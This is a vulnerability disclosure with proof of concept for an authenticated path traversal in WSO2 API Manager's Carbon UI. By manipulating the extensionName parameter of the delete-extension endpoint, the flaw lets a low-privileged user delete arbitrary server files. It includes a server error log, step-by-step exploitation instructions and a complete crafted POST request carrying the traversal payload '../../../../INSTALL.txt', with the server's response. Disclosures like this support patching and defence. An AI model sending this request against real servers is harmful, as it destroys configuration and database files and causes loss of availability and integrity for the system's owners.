146 lines
No EOL
6 KiB
Text
146 lines
No EOL
6 KiB
Text
# Title: WSO2 3.1.0 - Arbitrary File Delete
|
|
# Date: 2020-04-12
|
|
# Author: raki ben hamouda
|
|
# Vendor: https://apim.docs.wso2.com
|
|
# Softwrare link: https://apim.docs.wso2.com/en/latest/
|
|
# CVE: N/A
|
|
|
|
|
|
Document Title:
|
|
===============
|
|
WOS2 API Manager(Delete Extension) Arbitrary File Delete(Path traversal )
|
|
|
|
|
|
##CVE not assigned yet
|
|
|
|
##Security Update : https://apim.docs.wso2.com/en/latest/
|
|
|
|
|
|
Common Vulnerability Scoring System:
|
|
====================================
|
|
8.5
|
|
|
|
|
|
Affected Product(s):
|
|
====================
|
|
WSO2 API Manager Carbon Interface
|
|
|
|
Exploitation Technique:
|
|
=======================
|
|
Remote
|
|
|
|
|
|
Severity Level:
|
|
===============
|
|
High
|
|
|
|
|
|
Technical Details & Description:
|
|
================================
|
|
A remote Arbitrary file delete vulnerability has been discovered in the official WSO2 API Manager Carbon UI product .
|
|
The security vulnerability allows a remote attacker with low privileges to perform authenticated application requests
|
|
and to delete arbitrary System files.
|
|
|
|
The vulnerability is located in the `/carbon/extensions/deleteExtension-ajaxprocessor.jsp` modules and the `extensionName` parameter
|
|
of the extension we want to delete. Remote attackers are able to delete arbitrary files as configuration files ,database(.db) files
|
|
via authenticated POST method requests with a crafted String arbitrary traversal files names in "extensionName" .
|
|
|
|
The security risk of the arbitrary delete vulnerability is estimated as High with a cvss (common vulnerability scoring system) count of 8.5.
|
|
Exploitation of the Path traversal vulnerability requires a low privilege web-application user account and no user interaction.
|
|
Successful exploitation of the vulnerability results in loss of availability, integrity and confidentiality.
|
|
|
|
===============================
|
|
|
|
Error Generated by Server in case of file not found from 'logfile' ( broughts my atttention ...)
|
|
|
|
[2020-01-04 01:40:43,318] ERROR - ResourceServiceClient Failed to remove extension.
|
|
org.apache.axis2.AxisFault: File does not exist: E:\api-wso2\bin\..\repository\d
|
|
eployment\server\registryextensions\commons-dir
|
|
at org.apache.axis2.util.Utils.getInboundFaultFromMessageContext(Utils.j
|
|
ava:531) ~[axis2_1.6.1.wso2v38.jar:?]
|
|
at org.apache.axis2.description.OutInAxisOperationClient.handleResponse(
|
|
OutInAxisOperation.java:382) ~[axis2_1.6.1.wso2v38.jar:?]
|
|
at org.apache.axis2.description.OutInAxisOperationClient.send(OutInAxisO
|
|
peration.java:457) ~[axis2_1.6.1.wso2v38.jar:?]
|
|
at org.apache.axis2.description.OutInAxisOperationClient.executeImpl(Out
|
|
InAxisOperation.java:228) ~[axis2_1.6.1.wso2v38.jar:?]
|
|
at org.apache.axis2.client.OperationClient.execute(OperationClient.java:
|
|
149) ~[axis2_1.6.1.wso2v38.jar:?]
|
|
at org.wso2.carbon.registry.extensions.stub.ResourceAdminServiceStub.rem
|
|
oveExtension(ResourceAdminServiceStub.java:5954) ~[org.wso2.carbon.registry.exte
|
|
nsions.stub_4.7.13.jar:?]
|
|
at org.wso2.carbon.registry.extensions.ui.clients.ResourceServiceClient.
|
|
deleteExtension(ResourceServiceClient.java:137) [org.wso2.carbon.registry.extens
|
|
ions.ui_4.7.13.jar:?]
|
|
at org.apache.jsp.extensions.deleteExtension_002dajaxprocessor_jsp._jspS
|
|
ervice(deleteExtension_002dajaxprocessor_jsp.java:139) [hc_795974301/:?]
|
|
at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70) [t
|
|
omcat_9.0.22.wso2v1.jar:?]
|
|
|
|
*Error displayed in Web browser with body request:
|
|
|
|
<script type="text/javascript">
|
|
CARBON.showErrorDialog("File does not exist: E:\api-wso2\bin\..\repository\deployment\server\registryextensions\nofile.jar");
|
|
</script>
|
|
|
|
|
|
|
|
=============================
|
|
|
|
Request Method(s):
|
|
[+] POST
|
|
|
|
Vulnerable Module(s):
|
|
[+] /carbon/extensions/deleteExtension-ajaxprocessor.jsp
|
|
|
|
Vulnerable Parameter(s):
|
|
[+] extensionName
|
|
|
|
|
|
Server version
|
|
3.0.0
|
|
|
|
|
|
Proof of Concept (PoC):
|
|
=======================
|
|
The security vulnerability can be exploited by remote attackers with low privileged web-application user account and with no user interaction.
|
|
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
|
|
|
|
|
|
1-Attacker must have access to the Extension component(List ,Add ,Delete extensions )
|
|
2-attacker uploads any file .jar extension
|
|
3-attacker intercepts the request that follows and modifies the parameter with traversal string:
|
|
|
|
--- PoC Session Logs [POST] ---
|
|
|
|
POST /carbon/extensions/deleteExtension-ajaxprocessor.jsp HTTP/1.1
|
|
Host: localhost:9443
|
|
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
|
|
Accept: text/javascript, text/html, application/xml, text/xml, */*
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
X-Requested-With: XMLHttpRequest, XMLHttpRequest
|
|
X-Prototype-Version: 1.5.0
|
|
Content-type: application/x-www-form-urlencoded; charset=UTF-8
|
|
X-CSRF-Token: 0OQG-MM0W-1CY9-K503-1X3I-J4M1-YF2Z-J4NS
|
|
Content-Length: 22
|
|
Origin: https://localhost:9443
|
|
Connection: close
|
|
Referer: https://localhost:9443/carbon/extensions/list_extensions.jsp?region=region3&item=list_extensions_menu
|
|
Cookie: JSESSIONID=BD1005351C7DC1E70CA763D5EBD5390B; requestedURI=../../carbon/functions-library-mgt/functions-library-mgt-add.jsp?region=region1&item=function_libraries_add; region1_configure_menu=none; region3_registry_menu=visible; region4_monitor_menu=none; region5_tools_menu=none; current-breadcrumb=extensions_menu%252Clist_extensions_menu%2523; MSG15780931689110.08734318816834985=true; MSG15780932448520.1389658752202746=true; MSG15780934638710.11615678726759582=true; MSG15780941514590.39351165459685944=true; MSG15780941548760.1587776077002745=true; MSG15780944563770.9802725740232142=true; MSG15780944882480.28388839177015013=true; MSG15780945113520.5908842754830942=true; menuPanel=visible; menuPanelType=extensions
|
|
Pragma: no-cache
|
|
Cache-Control: no-cache
|
|
|
|
extensionName=../../../../INSTALL.txt
|
|
|
|
---------------Returned Headers in Response------------------
|
|
|
|
HTTP/1.1 200
|
|
X-Content-Type-Options: nosniff
|
|
X-XSS-Protection: 1; mode=block
|
|
X-Frame-Options: DENY
|
|
Content-Type: text/html;charset=UTF-8
|
|
Content-Length: 10
|
|
Date: Sat, 04 Jan 2020 00:55:38 GMT
|
|
Connection: close
|
|
Server: WSO2 Carbon Server |